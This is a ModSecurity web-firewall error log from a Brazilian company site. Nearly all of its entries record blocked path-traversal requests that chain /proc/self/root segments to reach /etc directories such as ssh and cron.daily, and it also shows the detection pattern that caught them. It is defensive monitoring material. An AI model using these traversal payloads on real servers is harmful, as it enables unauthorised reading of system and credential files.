[Tue Mar 17 09:28:26.304240 2026] [:error] [pid 2553:tid 140411666392832] [client 74.7.241.46:38482] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablI6v0Bec_B9OkZP_i8hwAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:28:35.318912 2026] [:error] [pid 2553:tid 140411725141760] [client 74.7.241.46:38482] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablI8_0Bec_B9OkZP_i8mAAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:28:36.659339 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.241.46:34696] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablI9AeiSKl8TjouI-YB4gAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:28:37.965213 2026] [:error] [pid 11469:tid 140411624429312] [client 74.7.241.46:34708] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablI9ZDEJR9VXonE_-1OmQAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:28:43.288519 2026] [:error] [pid 2553:tid 140411557287680] [client 74.7.243.203:60728] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablI-_0Bec_B9OkZP_i8ngAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:28:47.037956 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.243.203:50896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablI_weiSKl8TjouI-YB5wAAA9A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:28:53.844366 2026] [:error] [pid 11293:tid 140411716749056] [client 74.7.228.16:40638] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablJBdCmCSWTlPouqorLIwAAAMM"]
[Tue Mar 17 09:29:48.319023 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.241.46:53314] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJPJqmL8PQht4WJFlHswAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:29:54.714894 2026] [:error] [pid 11293:tid 140411599251200] [client 74.7.243.203:50902] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJQtCmCSWTlPouqorLoQAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:30:04.061662 2026] [:error] [pid 1731:tid 140411607643904] [client 74.7.241.46:57394] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJTAb2qCuy5irgBMjJDAAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:30:05.714908 2026] [:error] [pid 1016:tid 140411607643904] [client 74.7.241.46:58188] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJTZqmL8PQht4WJFlHuQAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:30:08.300326 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.241.46:58194] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJUAeiSKl8TjouI-YCCwAAA8M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:30:19.619613 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.241.46:57400] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJW6BJNF7axNlVR0X8UgAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:30:32.743246 2026] [:error] [pid 11469:tid 140411708356352] [client 74.7.241.46:34604] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJaJDEJR9VXonE_-1O2QAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:30:34.089029 2026] [:error] [pid 2159:tid 140411666392832] [client 74.7.241.46:43652] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJavct6CQ8jnRyg2p8CgAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:30:35.413910 2026] [:error] [pid 11469:tid 140411607643904] [client 74.7.241.46:43660] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJa5DEJR9VXonE_-1O2wAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:30:36.788196 2026] [:error] [pid 1210:tid 140411607643904] [client 74.7.241.46:43668] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJbFKJy4A1bGlmj9BVlgAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:30:43.555635 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.241.46:43680] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJcweiSKl8TjouI-YCLAAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:30:44.863503 2026] [:error] [pid 11293:tid 140411607643904] [client 74.7.241.46:54602] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJdNCmCSWTlPouqorL2QAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:30:46.190254 2026] [:error] [pid 2325:tid 140411649607424] [client 74.7.241.46:54612] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJdu82sZHvlq4xgHrCVQAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:30:48.531173 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.241.46:54622] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJeNCmCSWTlPouqorL3QAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:30:50.987725 2026] [:error] [pid 2325:tid 140411674785536] [client 74.7.241.46:39584] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJeu82sZHvlq4xgHrCWgAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
